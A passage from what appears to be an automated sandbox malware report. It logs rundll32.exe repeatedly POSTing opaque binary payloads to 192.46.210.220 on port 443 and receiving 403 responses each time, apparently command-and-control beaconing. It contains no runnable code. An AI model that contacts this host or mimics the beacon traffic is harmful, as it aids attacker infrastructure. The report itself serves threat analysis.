                                                                                                      2021-10-28 02:46:50 UTC60OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:50 UTC64INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.749828192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:52 UTC64OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:52 UTC65OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:52 UTC69INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:52 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.749832192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:53 UTC69OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:53 UTC70OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:54 UTC74INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.749836192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:55 UTC74OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:55 UTC75OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:56 UTC79INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:56 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.749840192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:57 UTC79OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:57 UTC80OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:58 UTC84INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.749844192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:59 UTC84OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:59 UTC85OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:00 UTC89INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.749848192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:02 UTC89OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:02 UTC90OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:03 UTC94INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:03 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.749852192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:03 UTC94OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:03 UTC95OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:04 UTC99INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.749782192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:29 UTC9OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:29 UTC10OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:30 UTC14INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:30 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.749857192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:06 UTC99OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:06 UTC100OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:07 UTC104INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.749860192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:07 UTC104OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:07 UTC105OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:08 UTC109INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:08 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.749867192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:10 UTC109OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:10 UTC110OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:10 UTC114INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.749869192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:11 UTC114OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:11 UTC115OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:12 UTC119INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:12 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.749875192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:14 UTC119OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
